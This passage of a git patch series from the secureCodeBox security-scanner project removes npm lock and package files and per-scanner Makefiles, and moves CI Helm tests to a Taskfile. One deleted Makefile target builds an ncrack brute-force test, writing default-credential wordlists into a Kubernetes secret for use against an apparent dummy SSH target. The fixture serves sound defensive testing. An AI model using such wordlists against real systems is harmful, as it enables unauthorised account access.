"4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - } - }, - "string-width-cjs": { - "version": "npm:string-width@4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - } - }, - "strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "requires": { - "ansi-regex": "^5.0.1" - } - }, - "strip-ansi-cjs": { - "version": "npm:strip-ansi@6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "requires": { - "ansi-regex": "^5.0.1" - } - }, - "strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true - }, - "strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true - }, - "strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true - }, - "supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - }, - "supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true - }, - "table": { - "version": "6.7.1", - "resolved": "https://registry.npmjs.org/table/-/table-6.7.1.tgz", - "integrity": "sha512-ZGum47Yi6KOOFDE8m223td53ath2enHcYLgOCjGr5ngu8bdIARQk6mN/wRMv4yMRcHnCSnHbCEha4sobQx5yWg==", - "dev": true, - "peer": true, - "requires": { - "ajv": "^8.0.1", - "lodash.clonedeep": "^4.5.0", - "lodash.truncate": "^4.4.2", - "slice-ansi": "^4.0.0", - "string-width": "^4.2.0", - "strip-ansi": "^6.0.0" - }, - "dependencies": { - "ajv": { - "version": "8.6.2", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.6.2.tgz", - "integrity": "sha512-9807RlWAgT564wT+DjeyU5OFMPjmzxVobvDFmNAhY+5zD6A2ly3jDp6sgnfyDtlIQ+7H97oc/DGCzzfu9rjw9w==", - "dev": true, - "peer": true, - "requires": { - "fast-deep-equal": "^3.1.1", - "json-schema-traverse": "^1.0.0", - "require-from-string": "^2.0.2", - "uri-js": "^4.2.2" - } - }, - "json-schema-traverse": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", - "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", - "dev": true, - "peer": true - } - } - }, - "tar": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/tar/-/tar-7.1.0.tgz", - "integrity": "sha512-ENhg4W6BmjYxl8GTaE7/h99f0aXiSWv4kikRZ9n2/JRxypZniE84ILZqimAhxxX7Zb8Px6pFdheW3EeHfhnXQQ==", - "requires": { - "@isaacs/fs-minipass": "^4.0.0", - "chownr": "^3.0.0", - "minipass": "^7.1.0", - "minizlib": "^3.0.1", - "mkdirp": "^3.0.1", - "yallist": "^5.0.0" - }, - "dependencies": { - "yallist": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-5.0.0.tgz", - "integrity": "sha512-YgvUTfwqyc7UXVMrB+SImsVYSmTS8X/tSrtdNZMImM+n7+QTriRXyXim0mBrTXNeqzVF0KWGgHPeiyViFFrNDw==" - } - } - }, - "test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "requires": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - } - }, - "text-table": { - "version": "0.2.0", - "resolved": "https://registry.npmjs.org/text-table/-/text-table-0.2.0.tgz", - "integrity": "sha1-f17oI66AUgfACvLfSoTsP8+lcLQ=", - "dev": true, - "peer": true - }, - "throat": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/throat/-/throat-6.0.2.tgz", - "integrity": "sha512-WKexMoJj3vEuK0yFEapj8y64V0A6xcuPuK9Gt1d0R+dzCSJc0lHqQytAbSB4cDAK0dWh4T0E2ETkoLE2WZ41OQ==", - "dev": true - }, - "tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "to-fast-properties": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", - "integrity": "sha1-3F5pjL0HkmW8c+A3doGk5Og/YW4=", - "dev": true - }, - "to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "requires": { - "is-number": "^7.0.0" - } - }, - "tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", - "requires": { - "psl": "^1.1.28", - "punycode": "^2.1.1" - } - }, - "ts-jest": { - "version": "29.2.5", - "resolved": "https://registry.npmjs.org/ts-jest/-/ts-jest-29.2.5.tgz", - "integrity": "sha512-KD8zB2aAZrcKIdGk4OwpJggeLcH1FgrICqDSROWqlnJXGCXK4Mn6FcdK2B6670Xr73lHMG1kHw8R87A0ecZ+vA==", - "dev": true, - "requires": { - "bs-logger": "^0.2.6", - "ejs": "^3.1.10", - "fast-json-stable-stringify": "^2.1.0", - "jest-util": "^29.0.0", - "json5": "^2.2.3", - "lodash.memoize": "^4.1.2", - "make-error": "^1.3.6", - "semver": "^7.6.3", - "yargs-parser": "^21.1.1" - } - }, - "tslib": { - "version": "2.6.2", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.6.2.tgz", - "integrity": "sha512-AEYxH93jGFPn/a2iVAwW87VuUIkR1FVUKB77NwMF7nBTDkDrrT/Hpt/IrCJ0QXhW27jTBDcf5ZY7w6RiqTMw2Q==" - }, - "tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", - "requires": { - "safe-buffer": "^5.0.1" - } - }, - "tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" - }, - "type-check": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/type-check/-/type-check-0.4.0.tgz", - "integrity": "sha512-XleUoc9uwGXqjWwXaUTZAmzMcFZ5858QA2vvx1Ur5xIcixXIP+8LnFDgRplU30us6teqdlskFfu+ae4K79Ooew==", - "dev": true, - "peer": true, - "requires": { - "prelude-ls": "^1.2.1" - } - }, - "type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true - }, - "type-fest": { - "version": "0.20.2", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.20.2.tgz", - "integrity": "sha512-Ne+eE4r0/iWnpAxD852z3A+N0Bt5RN//NjJwRd2VFHEmrywxf5vsZlh4R6lixl6B+wz/8d+maTSAkN1FIkI3LQ==", - "dev": true, - "peer": true - }, - "typescript": { - "version": "5.7.2", - "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.7.2.tgz", - "integrity": "sha512-i5t66RHxDvVN40HfDd1PsEThGNnlMCMT3jMUuoh9/0TaqWevNontacunWyN02LA9/fIbEWlcHZcgTKb9QoaLfg==", - "dev": true - }, - "undici-types": { - "version": "6.20.0", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.20.0.tgz", - "integrity": "sha512-Ny6QZ2Nju20vw1SRHe3d9jVu6gJ+4e3+MMpqu7pqE5HT6WsTSlce++GQmK5UXS8mzV8DSYHrQH+Xrf2jVcuKNg==", - "dev": true - }, - "update-browserslist-db": { - "version": "1.0.13", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.0.13.tgz", - "integrity": "sha512-xebP81SNcPuNpPP3uzeW1NYXxI3rxyJzF3pD6sH4jE7o/IX+WtSpwnVU+qIsDPyk0d3hmFQ7mjqc6AtV604hbg==", - "dev": true, - "requires": { - "escalade": "^3.1.1", - "picocolors": "^1.0.0" - } - }, - "uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "requires": { - "punycode": "^2.1.0" - } - }, - "uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" - }, - "v8-compile-cache": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/v8-compile-cache/-/v8-compile-cache-2.3.0.tgz", - "integrity": "sha512-l8lCEmLcLYZh4nbunNZvQCJc5pv7+RCwa8q/LdUx8u7lsWvPDKmpodJAJNwkAhJC//dFY48KuIEmjtd4RViDrA==", - "dev": true, - "peer": true - }, - "v8-to-istanbul": { - "version": "9.2.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.2.0.tgz", - "integrity": "sha512-/EH/sDgxU2eGxajKdwLCDmQ4FWq+kpi3uCmBGpw1xJtnAxEjlD8j8PEiGWpCIMIs3ciNAgH0d3TTJiUkYzyZjA==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^2.0.0" - } - }, - "verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", - "requires": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" - } - }, - "walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "requires": { - "makeerror": "1.0.12" - } - }, - "which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "requires": { - "isexe": "^2.0.0" - } - }, - "word-wrap": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/word-wrap/-/word-wrap-1.2.4.tgz", - "integrity": "sha512-2V81OA4ugVo5pRo46hAoD2ivUJx8jXmWXfUkY4KFNw0hEptvN0QfH3K4nHiwzGeKl5rFKedV48QVoqYavy4YpA==", - "dev": true, - "peer": true - }, - "wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "requires": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - } - }, - "wrap-ansi-cjs": { - "version": "npm:wrap-ansi@7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "requires": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - } - }, - "wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha1-tSQ9jz7BqjXxNkYFvA0QNuMKtp8=", - "dev": true - }, - "write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "requires": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - } - }, - "ws": { - "version": "8.18.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.0.tgz", - "integrity": "sha512-8VbfWfHLbbwu3+N6OKsOMpBdT4kXPDDB9cJk2bJ6mh9ucxdlnNvH1e+roYkKmN9Nxw2yjz7VzeO9oOz2zJ04Pw==", - "requires": {} - }, - "y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true - }, - "yaml": { - "version": "1.10.2", - "resolved": "https://registry.npmjs.org/yaml/-/yaml-1.10.2.tgz", - "integrity": "sha512-r3vXyErRCYJ7wg28yvBY5VSoAF8ZvlcW9/BwUzEtUsjvX/DKs24dIkuwjtuprwJJHsbyUbLApepYTR1BN4uHrg==", - "dev": true - }, - "yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "requires": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - } - }, - "yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true - }, - "yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true - } - } -} diff --git a/package-lock.json.license b/package-lock.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/package-lock.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/package.json b/package.json deleted file mode 100644 index eb8b46cf3b..0000000000 --- a/package.json +++ /dev/null @@ -1,55 +0,0 @@ -{ - "name": "@securecodebox/securecodebox", - "version": "1.0.1", - "description": "", - "homepage": "https://github.com/secureCodeBox/secureCodeBox#readme", - "repository": { - "type": "git", - "url": "git+https://github.com/secureCodeBox/secureCodeBox.git" - }, - "main": "index.js", - "scripts": { - "test": "jest" - }, - "keywords": [ - "secureCodeBox", - "security" - ], - "author": { - "name": "iteratec GmbH", - "email": "securecodebox@iteratec.com", - "url": "https://www.iteratec.com" - }, - "contributors": [ - { - "name": "Jannik Hollenbach", - "url": "https://github.com/J12934" - }, - { - "name": "Robert Seedorff", - "url": "https://github.com/rseedorff" - } - ], - "bugs": { - "url": "https://github.com/secureCodeBox/secureCodeBox/issues" - }, - "license": "Apache-2.0", - "devDependencies": { - "@types/jest": "^29.5.14", - "@types/node": "^22.10.2", - "jest": "^29.7.0", - "jest-runner-eslint": "^2.2.1", - "prettier": "^3.4.2", - "ts-jest": "^29.2.5", - "typescript": "^5.7.2" - }, - "jest": { - "projects": [ - "/scanners/", - "/hooks/" - ] - }, - "dependencies": { - "@kubernetes/client-node": "^0.22.3" - } -} diff --git a/package.json.license b/package.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/package.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 From 15add0d955a13603190b6e72cf9f5aa7c071b834 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Fri, 11 Jul 2025 10:25:29 +0200 Subject: [PATCH 121/137] Delete Makefiles for scanners and hooks Migrate helm test running in ci to task --- .github/workflows/ci.yaml | 28 ++------ Taskfile.yaml | 9 +++ hooks/Makefile | 32 ---------- hooks/cascading-scans/Makefile | 74 ---------------------- hooks/finding-post-processing/Makefile | 23 ------- hooks/generic-webhook/Makefile | 22 ------- hooks/notification/Makefile | 23 ------- hooks/persistence-azure-monitor/Makefile | 15 ----- hooks/persistence-defectdojo/Makefile | 19 ------ hooks/persistence-dependencytrack/Makefile | 10 --- hooks/persistence-elastic/Makefile | 49 -------------- hooks/update-field-hook/Makefile | 28 -------- scanners/Makefile | 32 ---------- scanners/amass/Makefile | 12 ---- scanners/cmseek/Makefile | 15 ----- scanners/ffuf/Makefile | 16 ----- scanners/git-repo-scanner/Makefile | 17 ----- scanners/gitleaks/Makefile | 11 ---- scanners/kube-hunter/Makefile | 12 ---- scanners/ncrack/Makefile | 15 ----- scanners/nikto/Makefile | 15 ----- scanners/nmap/Makefile | 12 ---- scanners/nuclei/Makefile | 24 ------- scanners/screenshooter/Makefile | 15 ----- scanners/semgrep/Makefile | 14 ---- scanners/ssh-audit/Makefile | 15 ----- scanners/sslyze/Makefile | 14 ---- scanners/test-scan/Makefile | 12 ---- scanners/trivy-sbom/Makefile | 11 ---- scanners/trivy/Makefile | 21 ------ scanners/whatweb/Makefile | 12 ---- scanners/wpscan/Makefile | 14 ---- scanners/zap-automation-framework/Makefile | 14 ---- 33 files changed, 15 insertions(+), 640 deletions(-) delete mode 100644 hooks/Makefile delete mode 100644 hooks/cascading-scans/Makefile delete mode 100644 hooks/finding-post-processing/Makefile delete mode 100644 hooks/generic-webhook/Makefile delete mode 100644 hooks/notification/Makefile delete mode 100644 hooks/persistence-azure-monitor/Makefile delete mode 100644 hooks/persistence-defectdojo/Makefile delete mode 100644 hooks/persistence-dependencytrack/Makefile delete mode 100644 hooks/persistence-elastic/Makefile delete mode 100644 hooks/update-field-hook/Makefile delete mode 100644 scanners/Makefile delete mode 100644 scanners/amass/Makefile delete mode 100644 scanners/cmseek/Makefile delete mode 100644 scanners/ffuf/Makefile delete mode 100644 scanners/git-repo-scanner/Makefile delete mode 100644 scanners/gitleaks/Makefile delete mode 100644 scanners/kube-hunter/Makefile delete mode 100644 scanners/ncrack/Makefile delete mode 100644 scanners/nikto/Makefile delete mode 100644 scanners/nmap/Makefile delete mode 100644 scanners/nuclei/Makefile delete mode 100644 scanners/screenshooter/Makefile delete mode 100644 scanners/semgrep/Makefile delete mode 100644 scanners/ssh-audit/Makefile delete mode 100644 scanners/sslyze/Makefile delete mode 100644 scanners/test-scan/Makefile delete mode 100644 scanners/trivy-sbom/Makefile delete mode 100644 scanners/trivy/Makefile delete mode 100644 scanners/whatweb/Makefile delete mode 100644 scanners/wpscan/Makefile delete mode 100644 scanners/zap-automation-framework/Makefile diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index ebcccbdf1b..c777510ff3 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -110,29 +110,13 @@ jobs: run: | helm plugin install https://github.com/helm-unittest/helm-unittest.git --version ${{ env.HELM_PLUGIN_UNITTEST }} - - name: Helm-Chart Unit Tests | Operator - working-directory: ./operator - run: make helm-unit-tests - - - name: Helm-Chart Unit Tests | AutoDiscovery Cloud AWS - working-directory: ./auto-discovery/cloud-aws - run: make helm-unit-tests - - - name: Helm-Chart Unit Tests | AutoDiscovery Kubernetes - working-directory: ./auto-discovery/kubernetes - run: make helm-unit-tests - - - name: Helm-Chart Unit Tests | Hooks - working-directory: ./hooks - run: make helm-unit-tests - - - name: Helm-Chart Unit Tests | Scanners - working-directory: ./scanners - run: make helm-unit-tests + - name: Install Task + uses: arduino/setup-task@v2 + with: + version: 3.x - - name: Helm-Chart Unit Tests | Demo-Targets - working-directory: ./demo-targets - run: make helm-unit-tests + - name: Helm-Chart Unit Tests + run: task test:helm:all unit-java: name: "Unit-Test | Java" diff --git a/Taskfile.yaml b/Taskfile.yaml index 2a44547edd..2c427a75dd 100644 --- a/Taskfile.yaml +++ b/Taskfile.yaml @@ -101,3 +101,12 @@ tasks: - 'echo "Press Ctrl+C to stop port forwarding"' - kubectl port-forward -n securecodebox-system svc/securecodebox-operator-minio 9001:9001 interactive: true + + test:helm:all: + cmds: + - | + find . -name "Chart.yaml" | while read -r chart_file; do + chart_dir=$(dirname "$chart_file") + echo "Running tests for helm chart: $chart_dir" + helm unittest $chart_dir + done diff --git a/hooks/Makefile b/hooks/Makefile deleted file mode 100644 index 62c3669841..0000000000 --- a/hooks/Makefile +++ /dev/null @@ -1,32 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include ../prerequisites.mk - -.PHONY: integration-tests -integration-tests: - for dir in $(wildcard */.); do \ - $(MAKE) integration-tests -C $$dir;\ - done - -.PHONY: unit-tests -unit-tests: - for dir in $(wildcard */.); do \ - $(MAKE) unit-tests -C $$dir;\ - done - -.PHONY: helm-unit-tests -helm-unit-tests: - set -e; \ - for directory in ./*; do \ - if [ -d "$$directory" ]; then \ - dir_name=$$(basename "$$directory"); \ - if [ "$$dir_name" != "coverage" ] && [ "$$dir_name" != "node_modules" ] && [ "$$dir_name" != "persistence-static-report" ]; then \ - helm unittest "$$directory"; \ - fi; \ - fi; \ - done diff --git a/hooks/cascading-scans/Makefile b/hooks/cascading-scans/Makefile deleted file mode 100644 index 1b417f33df..0000000000 --- a/hooks/cascading-scans/Makefile +++ /dev/null @@ -1,74 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -hook = cascading-scans - -test_files = [hook.test.js, kube.test.js] - -include ../../hooks.mk - -# Deploys dependencies for both the nmap-ncrack test and the nmap-sslyze test -.PHONY: deploy-test-deps -deploy-test-deps: deploy-test-deps-1 deploy-test-deps-2 - -.PHONY: test-2 -test-2: | clean-integration-tests unit-tests docker-build docker-export kind-import deploy deploy-test-deps-2 integration-tests-2 - -.PHONY: deploy-test-dep-nmap -deploy-test-dep-nmap: - cd $(SCANNERS_DIR)/nmap/ && $(MAKE) -s docker-build docker-export kind-import && \ - helm -n integration-tests upgrade --install nmap . \ - --set="scanner.image.repository=docker.io/$(IMG_NS)/$(scanner-prefix)-nmap" \ - --set="parser.image.repository=docker.io/$(IMG_NS)/$(parser-prefix)-nmap" \ - --set="parser.image.tag=$(IMG_TAG)" \ - --set="scanner.image.tag=$(IMG_TAG)" \ - --set="parser.env[0].name=CRASH_ON_FAILED_VALIDATION" \ - --set-string="parser.env[0].value=true" \ - --set="cascadingRules.enabled=true" - -.PHONY: deploy-test-dep-ncrack -deploy-test-dep-ncrack: - printf "root\nadmin\n" > users.txt - printf "THEPASSWORDYOUCREATED\n123456\npassword\n" > passwords.txt - kubectl create secret generic --from-file users.txt --from-file passwords.txt ncrack-lists -n integration-tests --dry-run=client -o yaml | kubectl apply -f - - cd $(SCANNERS_DIR)/ncrack/ && $(MAKE) -s docker-build docker-export kind-import && \ - helm -n integration-tests upgrade --install ncrack . \ - --set="scanner.image.repository=docker.io/$(IMG_NS)/$(scanner-prefix)-ncrack" \ - --set="parser.image.repository=docker.io/$(IMG_NS)/$(parser-prefix)-ncrack" \ - --set="parser.image.tag=$(IMG_TAG)" \ - --set="scanner.image.tag=$(IMG_TAG)" \ - --set="parser.env[0].name=CRASH_ON_FAILED_VALIDATION" \ - --set-string="parser.env[0].value=true" \ - --set="scanner.extraVolumes[0].name=ncrack-lists" \ - --set="scanner.extraVolumes[0].secret.secretName=ncrack-lists" \ - --set="scanner.extraVolumeMounts[0].name=ncrack-lists" \ - --set="scanner.extraVolumeMounts[0].mountPath=/ncrack/" \ - --set="cascadingRules.enabled=true" - -.PHONY: deploy-test-dep-sslyze -deploy-test-dep-sslyze: - cd $(SCANNERS_DIR)/sslyze/ && $(MAKE) -s docker-build docker-export kind-import && \ - helm -n integration-tests upgrade --install sslyze . --wait \ - --set="parser.image.repository=docker.io/$(IMG_NS)/$(parser-prefix)-sslyze" \ - --set="parser.image.tag=$(IMG_TAG)" \ - --set="parser.env[0].name=CRASH_ON_FAILED_VALIDATION" \ - --set-string="parser.env[0].value=true" \ - --set="cascadingRules.enabled=true" - -.PHONY: deploy-test-deps-1 # Deploys dependencies for the nmap-ncrack test -deploy-test-deps: deploy-test-dep-dummy-ssh deploy-test-dep-nmap deploy-test-dep-ncrack - -.PHONY: deploy -deploy: - @echo ".: 💾 Deploying '$(name)' $(hook-prefix) HelmChart with the docker tag '$(IMG_TAG)' into kind namespace 'cascading-scans'." - helm -n integration-tests upgrade --install dssh . --wait \ - --set="hook.image.repository=docker.io/$(IMG_NS)/$(hook-prefix)-$(name)" \ - --set="hook.image.tag=$(IMG_TAG)" - -.PHONY: deploy-test-deps-2 # Deploys dependencies for the nmap-sslyze test -deploy-test-deps-2: deploy-test-dep-unsafe-https deploy-test-dep-nmap deploy-test-dep-sslyze \ No newline at end of file diff --git a/hooks/finding-post-processing/Makefile b/hooks/finding-post-processing/Makefile deleted file mode 100644 index f8991b79cd..0000000000 --- a/hooks/finding-post-processing/Makefile +++ /dev/null @@ -1,23 +0,0 @@ 